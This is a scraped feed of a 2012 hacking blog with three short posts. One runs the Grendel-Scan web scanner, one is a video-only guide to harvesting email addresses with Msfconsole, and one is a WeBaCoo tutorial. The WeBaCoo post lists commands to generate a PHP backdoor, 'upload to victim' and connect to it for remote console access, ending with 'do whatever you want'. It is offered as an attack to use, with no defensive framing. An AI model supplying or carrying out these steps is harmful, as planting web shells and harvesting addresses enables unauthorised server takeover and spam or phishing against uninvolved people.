<span style="color: #333333;"><span style="font-family: Courier New, Courier, monospace; font-size: large; line-height: 18px;"><b>/pentest/web/grendel-scan# sh grendel.sh</b></span></span><br />
<span style="color: #333333;"><span style="font-family: Courier New, Courier, monospace; font-size: large; line-height: 18px;"><b>Video TUTO :</b></span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<b><span style="font-family: Courier New, Courier, monospace; font-size: large;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/neEbw-VzOxA?feature=player_embedded' frameborder='0'></iframe></span></b></div>
<b><span style="font-family: Courier New, Courier, monospace; font-size: large;"><span style="color: #333333;"><span style="line-height: 18px;"><br /></span></span>
<span style="color: #333333;"><span style="line-height: 18px;">Enjoy!</span></span></span></b></div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-89394829182051935892012-11-05T09:11:00.002-08:002012-11-05T09:11:28.188-08:00How to Collect / Harvest Email accounts<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://www6.indep.k12.mo.us/wp-content/uploads/2009/06/email_icon.gif" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="http://www6.indep.k12.mo.us/wp-content/uploads/2009/06/email_icon.gif" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div style="font-size: medium; text-align: left;">
How to harvest and collect Email accounts using Msfconsole </div>
<div>
<br /></div>
</td></tr>
</tbody></table>
</div>
<div class="separator" style="clear: both; text-align: left;">
Follow this video : </div>
<div class="separator" style="clear: both; text-align: left;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/pjFwx-TEp30?feature=player_embedded' frameborder='0'></iframe></div>
<div style="text-align: center;">
<br /></div>
</div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.comtag:blogger.com,1999:blog-3442683768255841191.post-19249319184055290152012-11-04T09:32:00.003-08:002012-11-04T09:32:30.195-08:00WeBaCoo Web backdoor<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF8KulDHuTChDrsfj5wnFTezkEs4ayS1B_Dkn36WwBvGpyPRL5loe5lzOqLgluQR88A8XikUq_ZoAGjMZRAcBvpEvJeSoF7UMlvMNTRGp5zJZ10aRjT2devw_tn9i0P-SfM2pYKr2YR04/s1600/psql-cli_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF8KulDHuTChDrsfj5wnFTezkEs4ayS1B_Dkn36WwBvGpyPRL5loe5lzOqLgluQR88A8XikUq_ZoAGjMZRAcBvpEvJeSoF7UMlvMNTRGp5zJZ10aRjT2devw_tn9i0P-SfM2pYKr2YR04/s320/psql-cli_1.png" width="320" /></a></div>
<div style="text-align: left;">
</div>
<div id="watch-description-clip" style="border: 0px; float: left; font-size: 12px; margin: 0px; padding: 0px; position: relative; width: 450px; z-index: 1;">
<div id="watch-description-text" style="border: 0px; font-size: 1.09em; line-height: 1.4; margin: 0px; padding: 0px;">
<span style="font-family: Courier New, Courier, monospace;">1. Get the WeBaCoo<br />- git clone <a class="yt-uix-redirect-link" data-redirect-href-updated="true" dir="ltr" href="http://www.youtube.com/redirect?q=https%3A%2F%2Fgithub.com%2Fanestisb%2FWeBaCoo&session_token=ma01P6ikNTStIUtkNP4b6diLXQJ8MTM1MjEzNjA5MEAxMzUyMDQ5Njkw" rel="nofollow" style="border: 0px; color: #1c62b9; cursor: pointer; margin: 0px; padding: 0px; text-decoration: none;" target="_blank" title="https://github.com/anestisb/WeBaCoo">https://github.com/anestisb/WeBaCoo</a> webacoo<br />- cd webacoo<br />- ./webacoo.pl -h<br />2. Generate php backdoor file<br />- ./webacoo.pl -g -o backdoor.php<br />3. upload to victim<br />4. Use WeBaCoo connect to backdoor<br />- ./webacoo.pl -t -u <a class="yt-uix-redirect-link" dir="ltr" href="http://victim/backdoor.php" rel="nofollow" style="border: 0px; color: #1c62b9; cursor: pointer; margin: 0px; padding: 0px;" target="_blank" title="http://victim/backdoor.php">http://victim/backdoor.php</a>5. Now you are in the victim console, do whatever you want :) .</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Tutorial by My friend <b>Proxy Traffic</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">and for more Understrand watch video on Youtube </span><a href="http://youtu.be/xJ8AH6bsPOM" style="font-size: 1.09em; line-height: 1.4;" target="_blank">Click Here !</a></div>
</div>
<ul id="watch-description-extra-info" style="border: 0px; font-size: 12px; list-style: none; margin: 0px 0px 0px 475px; min-height: 55px; padding: 0px; position: relative; width: 165px; z-index: 1;">
<li style="border: 0px; color: #666666; font-size: 0.9166em; line-height: 17px; margin: 0px 0px 1px; overflow: hidden; padding: 2px 0px;"><span class="video-extras-likes-dislikes" style="background-color: #ebebeb; border: 0px; font-family: arial, sans-serif; margin: 0px; padding: 0px;"></span></li>
</ul>
</div>
Anonymoushttp://www.blogger.com/profile/13921541482560422537noreply@blogger.com